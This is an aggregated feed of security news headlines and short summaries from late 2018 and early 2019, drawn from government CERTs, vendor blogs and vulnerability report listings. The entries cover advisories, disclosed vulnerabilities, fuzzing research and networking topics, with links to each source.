Apple has released a security update in its latest iOS version 12.1.4 to fix 4 vulnerabilities identified in various iOS devices. Report indicates that active exploitation against the vulnerabilities in Apple iOS have been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Protecting your Domain Names: Taking the First Steps
2019-02-07T05:00:00Z | 1549515600

Everyone and everything on the Internet depends on the Domain Name System (DNS) being functional. The DNS has been a common vector for attacks in recent years, and 2019 seems to be no different. Many of these attacks have goals far more sinister than simply taking a company offline or defacing a website; reported attacks include redirecting some or all of an organization's domain to gain access to protected resources, intercept traffic, and even obtain TLS certificates for that domain. Organizations should perform regular DNS reviews and audits. The following guidelines provide a starting point for your review.

https://www.akamai.com/blog/security/protecting-your-domain-names-taking-the-first-steps
Rakuten Viber Android Secret Chats Information Disclosure Vulnerability
2019-02-07T00:00:00Z | 1549497600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0655
Phishing Attacks Against Facebook / Google via Google Translate
2019-02-05T05:00:00Z | 1549342800

When it comes to phishing, criminals put a lot of effort into making their attacks look legitimate, while putting pressure on their victims to take action. In today's post, we're going to examine a recent phishing attempt against me personally....

https://www.akamai.com/blog/security/phishing-attacks-against-facebook-google-via-google-translate
The Pains and Problems of NFV
2019-02-04T15:29:42Z | 1549294182

All too many vendors like to trumpet the promise of network functions virtualization (NFV). But deploying an NFV architecture is fraught with so many problems and challenges that all too many telcos have abandoned the approach. Why and what are the problems? Read on to find out. NFV Success Overstated Limited operator deployments “Another miss... The post The Pains and Problems of NFV appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-pains-and-problems-of-nfv/
Jaanuaris avalikustatud andmelekkekogu sisaldab 460 000 eesti meiliaadressi
2019-01-30T11:52:58Z | 1548849178

Riigi Infosüsteemi Ameti (RIA) andmetel on 17. jaanuaril avalikustatud andmelekke kogumis ligikaudu 460 000 Eesti domeeniga (.ee lõpuga) meiliaadressi ning neist umbes 180 000 on levinud juba varasemate lekete kaudu. Uusi meiliaadresse on ligikaudu 280 000, millest enamik lekkis koos parooliga.

https://ria.ee/uudised/jaanuaris-avalikustatud-andmelekkekogu-sisaldab-460-000-eesti-meiliaadressi
Security Alert (A19-01-07): Multiple Vulnerabilities in Firefox
2019-01-30T04:00:00Z | 1548820800

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
ACD Systems Canvas Draw 5 huff table out-of-bounds write code execution vulnerability
2019-01-30T00:00:00Z | 1548806400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0648
ACD Systems Canvas Draw 4 FillSpan Out of Bounds Write Code Execution Vulnerability
2019-01-30T00:00:00Z | 1548806400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0638
ACD Systems Canvas Draw 5 Resolution_Set out-of-bounds write code execution vulnerability
2019-01-30T00:00:00Z | 1548806400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0649
ACD Systems Canvas Draw 5 IO metadata out-of-bounds write code execution vulnerability
2019-01-30T00:00:00Z | 1548806400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0642
What Enterprises Can Learn From The $55 Million Investment in Cato Networks
2019-01-29T10:30:05Z | 1548757805

We just announced the results from a fantastic 2018. A year where bookings grew by 352% year-over-year, business from the channel increased fivefold, and customer growth exploded to 300 enterprises serving thousands of branch locations worldwide. It’s an incredible achievement by any standards, perhaps only surpassed by one other piece of news — a $55... The post What Enterprises Can Learn From The $55 Million Investment in Cato Networks appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-enterprises-can-learn-from-the-55-million-investment-in-cato/
WIBU-SYSTEMS WibuKey.sys 0x8200E804 pool corruption privilege escalation vulnerability
2019-01-28T00:00:00Z | 1548633600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0658
WIBU-SYSTEMS WibuKey.sys 0x8200E804 kernel memory information disclosure vulnerability
2019-01-28T00:00:00Z | 1548633600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0657
Python.org CPython X509 certificate parsing denial-of-service vulnerability
2019-01-28T00:00:00Z | 1548633600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0758
WIBU-SYSTEMS WibuKey network server management WkbProgramLow remote code execution vulnerability
2019-01-28T00:00:00Z | 1548633600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0659
Symbolic Path Merging in Manticore
2019-01-25T12:50:16Z | 1548420616

Each year, Trail of Bits runs a month-long winter internship “winternship” program. This year we were happy to host 4 winterns who contributed to 3 projects. This is the first in a series of blog posts covering the 2019 Wintern class. Our first report is from Vaibhav Sharma (@vbsharma), a PhD student at the University […]

https://blog.trailofbits.com/2019/01/25/symbolic-path-merging-in-manticore/
Maturity Level 3 (Advanced) - Proactive...we’re ready for anything (mostly)
2019-01-24T14:00:00Z | 1548338400

Hopefully what we’ve outlined as suggested services and functions a PSIRT could offer at the various stages of their development will be helpful and inspires your team to raise their game.

https://www.first.org/blog/20190124-Maturity-Level-3
A Vulnerability in Debian?s Apt Allows for Easy Lateral Movement in Data Centers
2019-01-23T14:00:00Z | 1548252000

Learn about the new vulnerability that was found in Debian?s Advanced Package Tool that allows for easy lateral movement in data center.

https://www.akamai.com/blog/security/vulnerability-in-debians-advanced-package-tool
Maturity Level 2 (Intermediate) - I am reactive, but I’ve trained for it!
2019-01-23T14:00:00Z | 1548252000

Are you mature, are you immature - what are you? Maturity Level 2 is about adapting the ad-hoc PSIRT strategies into full blown policies and processes.

https://www.first.org/blog/20190123-Maturity-Level-2
Fuzzing an API with DeepState (Part 2)
2019-01-23T12:50:06Z | 1548247806

Alex Groce, Associate Professor, School of Informatics, Computing and Cyber Systems, Northern Arizona University Mutation Testing Introducing one bug by hand (as we did in Part 1) is fine, and we could try it again, but “the plural of anecdote is not data.” However, this is not strictly true. If we have enough anecdotes, we […]

https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/
The Beginning - a very fine place to start!
2019-01-22T14:00:00Z | 1548165600

To start you on your path to PSIRT goodness, you’ll want to read and digest the PSIRT Maturity Document created by your friendly global FIRST PSIRT representatives. And what’s a better place to start than at the beginning?

https://www.first.org/blog/20190122-The-Beginning
Fuzzing an API with DeepState (Part 1)
2019-01-22T12:50:21Z | 1548161421

Alex Groce, Associate Professor, School of Informatics, Computing and Cyber Systems, Northern Arizona University Using DeepState, we took a handwritten red-black tree fuzzer and, with minimal effort, turned it into a much more fully featured test generator. The DeepState fuzzer, despite requiring no more coding effort, supports replay of regression tests, reduction of the size […]

https://blog.trailofbits.com/2019/01/22/fuzzing-an-api-with-deepstate-part-1/
What You Should Know Before Choosing a Managed SD-WAN Service
2019-01-21T15:20:22Z | 1548084022

The growth and adoption of SD-WAN have continued strong through 2018 and we anticipate will continue into the next year. Gartner predicts the SD-WAN market to reach $1.3 billion by 2020. Early adopters were generally motivated by the cost savings and improved performance, but many today are driven to adopt it because of the agility... The post What You Should Know Before Choosing a Managed SD-WAN Service appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-you-should-know-before-choosing-a-managed-sd-wan-service/
What is a PSIRT and where do I start?
2019-01-21T14:00:00Z | 1548079200

The right place to get your fill on how to make a world-class Product Security Incident Response Team.

https://www.first.org/blog/20190121-What-is-a-PSIRT-and-where-do-I-start
How McSema Handles C++ Exceptions
2019-01-21T12:50:27Z | 1548075027

C++ programs using exceptions are problematic for binary lifters. The non-local control-flow “throw” and “catch” operations that appear in C++ source code do not map neatly to straightforward binary representations. One could allege that the compiler, runtime, and stack unwinding library collude to make exceptions work. We recently completed our investigation into exceptions and can […]

https://blog.trailofbits.com/2019/01/21/how-mcsema-handles-c-exceptions/
Bitdefender BOX 2 bootstrap download_image command injection vulnerability
2019-01-21T00:00:00Z | 1548028800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0919
Bitdefender BOX 2 bootstrap update_setup command execution vulnerability
2019-01-21T00:00:00Z | 1548028800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0918
Empire Hacking: Ethereum Edition 2
2019-01-18T12:50:58Z | 1547815858

On December 12, over 150 attendees joined a special, half-day Empire Hacking to learn about pitfalls in smart contract security and how to avoid them. Thank you to everyone who came, to our superb speakers, and to BuzzFeed for hosting this meetup at their office. Watch the presentations again It’s hard to find such rich […]

https://blog.trailofbits.com/2019/01/18/empire-hacking-ethereum-edition-2/
A Deep Dive into Point of Sale Security
2019-01-17T16:42:00Z | 1547743320

For many, Point of Sale systems are the weakest link in the IT security chain. Learn the microsegmentation policies that can make a difference.

https://www.akamai.com/blog/security/understanding-point-of-sale-security
How to write a rootkit without really trying
2019-01-17T12:50:53Z | 1547729453

We open-sourced a fault injection tool, KRF, that uses kernel-space syscall interception. You can use it today to find faulty assumptions (and resultant bugs) in your programs. Check it out! This post covers intercepting system calls from within the Linux kernel, via a plain old kernel module. We’ll go through a quick refresher on syscalls […]

https://blog.trailofbits.com/2019/01/17/how-to-write-a-rootkit-without-really-trying/
Security Alert (A19-01-05): Multiple Vulnerabilities in Drupal
2019-01-17T04:00:00Z | 1547697600

Drupal released security updates to fix the vulnerabilities resided in the Drupal Core and the PEAR Archive_tar library.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-01-04): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2019)
2019-01-16T04:00:00Z | 1547611200

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
On Bounties and Boffins
2019-01-14T11:50:53Z | 1547466653

Trying to make a living as a programmer participating in bug bounties is the same as convincing yourself that you’re good enough at Texas Hold ‘Em to quit your job. There’s data to back this up in Fixing a Hole: The Labor Market for Bugs, a chapter in New Solutions for Cybersecurity, by Ryan Ellis, […]

https://blog.trailofbits.com/2019/01/14/on-bounties-and-boffins/
Pixar Renderman install helper privilege escalation vulnerability
2019-01-14T00:00:00Z | 1547424000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0728
Pixar Renderman Install Helper Arbitrary File Read Privilege Escalation Vulnerability
2019-01-14T00:00:00Z | 1547424000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0729
Preparing for Y2038 (Already?!)
2019-01-10T06:32:00Z | 1547101920

It is possible that the need to upgrade and replace systems in the lead-up to 2038 will force the retirement of some remaining IPv4-only systems and networks.

https://www.akamai.com/blog/performance/preparing-for-y2038-already
WAN on a Software Timeline
2019-01-10T05:25:49Z | 1547097949

WANs are slow. Not in terms of data rates and such, but in terms of change. In most enterprises, the WAN changes more slowly than just about any other part of the infrastructure. People like to set up routers and such and then touch them as infrequently as possible—and that goes both for enterprises and... The post WAN on a Software Timeline appeared first on Cato Networks.

https://www.catonetworks.com/blog/wan-on-a-software-timeline/
Security Alert (A19-01-03): Multiple Vulnerabilities in Cisco Email Security Appliances
2019-01-10T04:00:00Z | 1547092800

Cisco released security advisories to address multiple vulnerabilities in Cisco AsyncOS Software for Cisco Email Security Appliances (ESA).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-01-02): Multiple Vulnerabilities in Microsoft Products (January 2019)
2019-01-09T04:00:00Z | 1547006400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Product Security Incident Response Team (PSIRT) Maturity Document
2019-01-08T16:00:00Z | 1546963200

https://first.org/education/PSIRT-maturity-document
Apple IntelHD5000 Graphics Process Token Privilege Escalation Vulnerability
2019-01-08T00:00:00Z | 1546905600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0615
From the Core to the Edge: 3 Security Imperatives and the Evolving Digital Topology
2019-01-06T05:00:00Z | 1546750800

The breathtaking pace at which everyone and everything is becoming connected is having a profound effect on digital business, from delivering exceptional experiences, to ensuring the security of your customers, applications, and workforce....

https://www.akamai.com/blog/security/from-the-core-to-the-edge-3-security-imperatives-and-the-evolving-digital-topology
RIA: Aegunud tarkvaraga ei saa dokumente allkirjastada
2019-01-04T07:13:56Z | 1546586036

Jaanuarist saavad arvutikasutajad digiallkirju anda üksnes ID-kaardi uue tarkvaraga DigiDoc4, mis avaldati esmakordselt möödunud aasta juulis. ID-kaardi tarkvara peavad uuendama kõik need, kes pole arvuti pakutud uuendust seni vastu võtnud.

https://ria.ee/uudised/ria-aegunud-tarkvaraga-ei-saa-dokumente-allkirjastada
Life at Akamai: Making Connections
2019-01-04T05:00:00Z | 1546578000

By the numbers, Akamai's scale, reach and ability to help brands connect users to immersive and immediate online experiences while protecting their businesses from threats, is quite impressive. While I'm proud that Akamai connects with billions of devices daily and...

https://www.akamai.com/blog/culture/life-at-akamai-making-connections
Security Alert (A19-01-01): Multiple Vulnerabilities in Adobe Reader/Acrobat
2019-01-04T04:00:00Z | 1546574400

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Low, Medium and High Interaction Honeypot Security
2019-01-03T19:10:00Z | 1546542600

Honeypots are a popular way to protect data centers and learn about attackers. Learn the difference between high and low interaction honeypot security.

https://www.akamai.com/blog/security/high-interaction-honeypot-versus-low-interaction-honeypot-comparison
Apple IntelHD5000 Graphics Delete Resource Privilege Escalation Vulnerability
2019-01-03T00:00:00Z | 1546473600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0614
Foxit PDF Reader XFA xdpContent information leak vulnerability
2019-01-03T00:00:00Z | 1546473600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0626
What do La Croix, octonions, and Second Life have in common?
2019-01-02T11:50:33Z | 1546429833

This year for CSAW CTF, Trail of Bits contributed two cryptography problems. In the first problem, you could combine two bugs to break DSA much like the Playstation 3 firmware hackers. The other challenge–-weirder and mathier–-was split into two parts: one for the qualifiers, one in finals. This challenge, “Holywater,” was some of the most […]

https://blog.trailofbits.com/2019/01/02/what-do-la-croix-octonions-and-second-life-have-in-common/
CleanMyMac X truncateFileAtPath Privilege Escalation Vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0708
CleanMyMac X removeItemAtPath Privilege Escalation Vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0707
CleanMyMac X moveItemAtPath privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0705
CleanMyMac X removeDiagnosticLogs privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0710
CleanMyMac X moveToTrashItemAtPath privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0706
Clean My Mac X removeLaunchdAgentAtPath privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0716
Clean My Mac X disableLaunchdAgentAtPath privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0721
CleanMyMac X removeKextAtPath privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0709
Clean My Mac X securelyRemoveItemAtPath privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0719
Clean My Mac X enableLaunchdAgentAtPath privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0715
Clean My Mac X removeASL Privilege Escalation Vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0717
Clean My Mac X removePackageWithID privilege escalation vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0718
Clean My Mac X pleaseTerminate denial-of-service vulnerability
2019-01-02T00:00:00Z | 1546387200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0720
SD-WAN Success Requires A New Kind Of Managed Service Provider
2019-01-01T09:56:13Z | 1546336573

The adoption of SD-WANs continues to skyrocket.  ZK Research forecasts the market for SD-WAN infrastructure and services will grow at almost 70% CAGR between now and 2022.  Why such strong adoption?  For most businesses, the WAN is long overdue for an upgrade as the current architecture has been in place for well over three decades.... The post SD-WAN Success Requires A New Kind Of Managed Service Provider appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-success-requires-a-new-kind-of-managed-service-provider/
Fuzzing Like It’s 1989
2018-12-31T11:50:18Z | 1546257018

With 2019 a day away, let’s reflect on the past to see how we can improve. Yes, let’s take a long look back 30 years and reflect on the original fuzzing paper, An Empirical Study of the Reliability of UNIX Utilities, and its 1995 follow-up, Fuzz Revisited, by Barton P. Miller. In this blog post, […]

https://blog.trailofbits.com/2018/12/31/fuzzing-like-its-1989/
Office 365 email phishing and data breaches very common – detect, protect, inform!
2018-12-31T11:32:45Z | 1546255965

In the spring of 2018, emails for employees and directors of several Finnish companies have been stolen and their credentials have been used in several cases of fraud and attempts of fraud. On the basis of notifications to the NCSC-FI, they have caused substantial losses and expenses to many Finnish companies. The NCSC-FI recommends that company directors allocate sufficient resources for the technical prevention and detection of frauds and data breaches and for the information to the employees about the threats.

https://www.kyberturvallisuuskeskus.fi/en/office-365-email-phishing-and-data-breaches-very-common-detect-protect-inform
Authentication bypass in D-Link DIR-850L
2018-12-31T09:53:37Z | 1546250017

It is possible to bypass the WPA authentication of the D-Link DIR-850L wlan router. An attacker can join the network without the required credentials.

https://www.kyberturvallisuuskeskus.fi/en/authentication-bypass-d-link-dir-850l
Vulnerabilities in service autodiscovery
2018-12-31T09:28:41Z | 1546248521

Some applications and protocols have autodiscovery functions relying on hardcoded DNS names. This can result to security issues when hostnames are automatically registered to DNS. Attackers can register autodiscovery domain names to perform man in the middle attacks.

https://www.kyberturvallisuuskeskus.fi/en/vulnerabilities-service-autodiscovery
Vulnerabilities in Goodmill Systems w24e and w24h routers
2018-12-31T08:46:21Z | 1546245981

Three privilege escalation vulnerabilities have been found from the firmware on Goodmill Systems w24e and w24h routers. A logged in user could unauthorizedly expand the user privileges in routers affected by the vulnerabilities. Goodmill Systems has released a new version of the firmware addressing the vulnerabilities.

https://www.kyberturvallisuuskeskus.fi/en/vulnerabilities-goodmill-systems-w24e-and-w24h-routers
Vulnerability in the handling of IP fragments
2018-12-31T08:38:43Z | 1546245523

TCP/IP stacks of Linux and Windows systems have a vulnerability in the handling of fragmented IP packets. An attacker may increase the effects of denial of service attacks by sending specially crafted IP fragments.

https://www.kyberturvallisuuskeskus.fi/en/vulnerability-handling-ip-fragments
TCP implementations vulnerable to Denial of Service
2018-12-31T08:32:57Z | 1546245177

The network stacks of recent Linux and FreeBSD kernels have a vulnerability that makes it possible to perform denial of service attacks with low packet volumes. Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port.

https://www.kyberturvallisuuskeskus.fi/en/tcp-implementations-vulnerable-denial-service
Busybox wget vulnerability
2018-12-31T08:29:43Z | 1546244983

BusyBox project has fixed a vulnerability in BusyBox wget that may allow an attacker to execute arbitrary commands in the target system.

https://www.kyberturvallisuuskeskus.fi/en/busybox-wget-vulnerability
Meltdown and Spectre exploit vulnerabilities in processors
2018-12-31T06:05:10Z | 1546236310

Meltdown and Spectre are attacks that exploit speculative execution, the way processors predict commands. Meltdown and Spectre exploit the way speculatively executed instructions can bypass process memory protection. These vulnerabilities are particularly harmful to multi-user server environments, giving malicious users access to users’ confidential information.

https://www.kyberturvallisuuskeskus.fi/en/meltdown-and-spectre-exploit-vulnerabilities-processors
Finnish users' passwords in clear text revealed
2018-12-30T04:18:23Z | 1546143503

The website liiketoimintasuunnitelma.com of the Finnish Enterprise Agency in Helsinki, Helsingin Uusyrityskeskus, has been a target for data break-in. In this data break-in around 130,000 users' usernames and passwords in clear text were revealed. It is possible that other confidential information has also been revealed. This data leak is the third largest in Finland in terms of the number of user accounts.

https://www.kyberturvallisuuskeskus.fi/en/finnish-users-passwords-clear-text-revealed
Still on the Fence about SD-WAN? Gartner Says to Include It in WAN Architecture Discussions
2018-12-26T14:21:28Z | 1545834088

SD-WAN solutions have become mainstream in the enterprise, but some organizations are still looking at the technology from afar and wondering if it could be right for them. If your organization is among those fence-sitters, there’s a new guide from Gartner (“Technology Insight for SD-WAN,” 14 September 2018 ID: G00369080) that could be helpful in... The post Still on the Fence about SD-WAN? Gartner Says to Include It in WAN Architecture Discussions appeared first on Cato Networks.

https://www.catonetworks.com/blog/still-on-the-fence-about-sd-wan-gartner-says-to-include-it-in-wan-architecture-discussions/
Telegram Android Secret Chats Information Disclosure Vulnerability
2018-12-21T00:00:00Z | 1545350400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0654
$10,000 research fellowships for underrepresented talent
2018-12-20T15:00:32Z | 1545318032

The Trail of Bits SummerCon Fellowship program is now accepting applications from emerging security researchers with excellent project ideas. Fellows will explore their research topics with our guidance and then present their findings at SummerCon 2019. We will be reserving at least 50% of our funding for marginalized, female-identifying, transgender, and non-binary candidates. If you’re […]

https://blog.trailofbits.com/2018/12/20/10000-research-fellowships-for-underrepresented-talent/
High Threat Security Alert (A18-12-08): Vulnerability in Microsoft Products
2018-12-20T04:00:00Z | 1545278400

Microsoft has released a security advisory addressing the scripting engine memory corruption vulnerability in Microsoft Internet Explorer.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-12-09): Vulnerability in Cisco Products
2018-12-20T04:00:00Z | 1545278400

Cisco has released the security advisory to address a vulnerability in Cisco Adaptive Security Appliance (ASA) software with web management interface enabled.

https://www.govcert.gov.hk/en/alerts_detail.php
NCSC-FI will continue its operations as before in the new Finnish Transport and Communications Agency Traficom
2018-12-19T14:41:33Z | 1545230493

The Finnish Communications Regulatory Authority (FICORA), Transport Safety Agency (Trafi), and certain official functions of the Transport Agency will merge into Finnish Transport and Communications Agency Traficom on 1 January 2019. The National Cyber Security Centre (NCSC-FI) has been a part of FICORA since 2014.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-will-continue-its-operations-new-finnish-transport-and-communications-agency-traficom
NCSC-FI will continue its operations as before in the new Finnish Transport and Communications Agency Traficom
2018-12-19T14:41:33Z | 1545230493

The Finnish Communications Regulatory Authority (FICORA), Transport Safety Agency (Trafi), and certain official functions of the Transport Agency will merge into Finnish Transport and Communications Agency Traficom on 1 January 2019. The National Cyber Security Centre (NCSC-FI) has been a part of FICORA since 2014.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-will-continue-its-operations-new-finnish-transport-and-communications-agency-traficom
Top Podcasts for SD-WAN and Network Professionals
2018-12-19T09:31:59Z | 1545211919

Podcasts are a great resource for keeping current on IT network topics like SD-WAN and hybrid cloud, though it can be tough finding the quality podcasts that are at the end of the day – really worth your time. Here are our favorite six podcasts that in our estimation, are definitely worth tuning in to…... The post Top Podcasts for SD-WAN and Network Professionals appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-podcasts-for-sd-wan-and-network-professionals/
CSAW CTF Crypto Challenge: Breaking DSA
2018-12-17T11:50:42Z | 1545047442

The Trail of Bits cryptographic services team contributed two cryptography CTF challenges to the recent CSAW CTF. Today we’re going to cover the easier one, titled “Disastrous Security Apparatus – Good luck, ‘k?” This problem involves the Digital Signature Algorithm (DSA) and the way an apparently secure algorithm can be made entirely insecure through surprising […]

https://blog.trailofbits.com/2018/12/17/csaw-ctf-crypto-challenge-breaking-dsa/
Security Alert (A18-12-07): Vulnerability in IBM Notes and Domino
2018-12-17T04:00:00Z | 1545019200

A vulnerability is found in the Notes System Diagnostic (NSD) service of the IBM Notes and Domino Windows versions.

https://www.govcert.gov.hk/en/alerts_detail.php
Webroot BrightCloud SDK HTTP headers-parsing code execution vulnerability
2018-12-17T00:00:00Z | 1545004800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0683
Webroot BrightCloud SDK HTTP connection unsafe defaults vulnerability
2018-12-17T00:00:00Z | 1545004800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0686
Reading ASP secrets for $17,000
2018-12-17T00:00:00Z | 1545004800

One of the more common vulnerabilities on ASP.NET applications is local file disclosure. If you've never developed or worked with this technology, exploiting LFD can be confusing and often unfruitful. In the following write up I describe approaching an application that ended up being vulnerable to LFD, then going on to exploit it.

https://samcurry.net/reading-asp-secrets-for-17000
Quiz Phishing: One Scam, 78 Variations
2018-12-15T07:00:00Z | 1544857200

Over the past year, Akamai Enterprise Threat Research team monitored the usage of one particular phishing toolkit in the wild. We previously wrote about this phishing toolkit as "Three Questions Quiz". The "Quiz" toolkit is not new to the threat landscape, as its been used in many phishing campaigns in recent years. Our goal here is to present new insights on the evolution and scale of usage of the toolkit in the wild. The most surprising insight was the variety of commercial brands being abused as part of these phishing scams that were all using the same toolkit, but wearing a different face.

https://www.akamai.com/blog/security/quiz-phishing--one-scam--78-variations
High Threat Security Alert (A18-12-03): Multiple Vulnerabilities in Microsoft Products (December 2018)
2018-12-12T04:00:00Z | 1544587200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate active exploitation against vulnerability in Windows kernel has been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-12-04): Multiple Vulnerabilities in Adobe Reader/Acrobat
2018-12-12T04:00:00Z | 1544587200

Security updates are released for Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-12-05): Multiple Vulnerabilities in Firefox
2018-12-12T04:00:00Z | 1544587200

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-12-06): Multiple Vulnerabilities in phpMyAdmin
2018-12-12T04:00:00Z | 1544587200

Security updates were released to address three vulnerabilities in phpMyAdmin.

https://www.govcert.gov.hk/en/alerts_detail.php
Detsembris jõuavad kasutusse esimesed uued ID-kaardid
2018-12-11T10:17:16Z | 1544523436

Detsembri algusest taotluse esitanud inimestele väljastatakse sel nädalal esimesed uue tootja ID-kaardid. Uutel kaartidel on senisest erinev kujundus, turvaelemendid ja kiip. Esimesed uues formaadis kiirdokumendid ja Digi-IDd on kasutuses juba eelmisest nädalast.

https://ria.ee/uudised/detsembris-jouavad-kasutusse-esimesed-uued-id-kaardid
Tales from the Trenches: What I Love About My Cato Cloud
2018-12-11T08:37:59Z | 1544517479

I’ve been an IT manager for a long time, only recently joining the Cato team. Prior to Cato, you might say that I lived my life in a box — a Cisco box, a Palo Alto box, a Checkpoint box….you get the point.  Now, as the IT manager at Cato, I’ve been using Cato Cloud... The post Tales from the Trenches: What I Love About My Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/tales-from-the-trenches-what-i-love-about-my-cato-cloud/
Adobe Acrobat Reader DC Text Field Value Remote Code Execution Vulnerability
2018-12-11T00:00:00Z | 1544486400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0704
Senine RIA peadirektor Taimar Peterkop asus täna tööle riigisekretärina
2018-12-10T07:38:39Z | 1544427519

Peaminister Jüri Ratas nimetas oma korraldusega Taimar Peterkopi riigisekretäri ametisse 10. detsembrist.

https://ria.ee/uudised/senine-ria-peadirektor-taimar-peterkop-asus-tana-toole-riigisekretarina
Facebook WhatsApp Desktop Multiple Web Connection Notice Bypass Vulnerability
2018-12-10T00:00:00Z | 1544400000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0643
Eesti.ee uueneb
2018-12-07T06:36:03Z | 1544164563

Täna varahommikul avalikustas Riigi Infosüsteemi Amet (RIA) uue disainiga riigiportaali www.eesti.ee.

https://ria.ee/uudised/eestiee-uueneb
FIRST launches The Incident Response Hall of Fame to honor visionaries and leaders in the field of cyber security
2018-12-06T22:00:00Z | 1544133600

https://www.first.org/newsroom/releases/20181206
High Threat Security Alert (A18-12-01): Multiple Vulnerabilities in Adobe Flash Player
2018-12-06T04:00:00Z | 1544068800

Adobe released a security update to address some vulnerabilities found in the Adobe Flash Player. Reports indicate that one of the vulnerabilities is being exploited in the wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-12-02): Multiple Vulnerabilities in Apple iOS
2018-12-06T04:00:00Z | 1544068800

Apple has released a security update in its latest iOS version 12.1.1 to fix 20 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Signal Messenger Android self deleting messages Information Disclosure Vulnerability
2018-12-06T00:00:00Z | 1544054400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0656
Why Carrier IP Peering is a Major Issue for Real-Time Traffic
2018-12-03T14:16:17Z | 1543846577

The core of the Internet is based on a plethora of peering agreements between the various carriers that transport IP traffic. These peering relationships are complex both financially and operationally. Peering disruptions, as recent events show, can significantly impact UCaaS and other real-time cloud traffic delivery. Peering Problems Impact Peering Partners For example, in my... The post Why Carrier IP Peering is a Major Issue for Real-Time Traffic appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-carrier-ip-peering-is-a-major-issue-for-real-time/
Netgate pfSense system_advanced_misc.php multiple remote command injection vulnerabilities
2018-12-03T00:00:00Z | 1543795200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0690
Bread And Butter Attacks
2018-11-29T14:00:00Z | 1543500000

We continuously find that the most basic attack methods that worked ten years ago still work and will probably continue to be effective in the future.

https://www.akamai.com/blog/security/bread-and-butter-attacks
An Experiment With Reverse Mentoring at Akamai India: Women Mentoring Senior Leaders on Gender Inclusion!
2018-11-28T05:00:00Z | 1543381200

Rumi said, "Clean out your ears, don't listen for what you already know." And that's exactly what leaders at Akamai India did during the pilot event of Flip, a reverse mentoring event, held earlier this month. High potential women from...

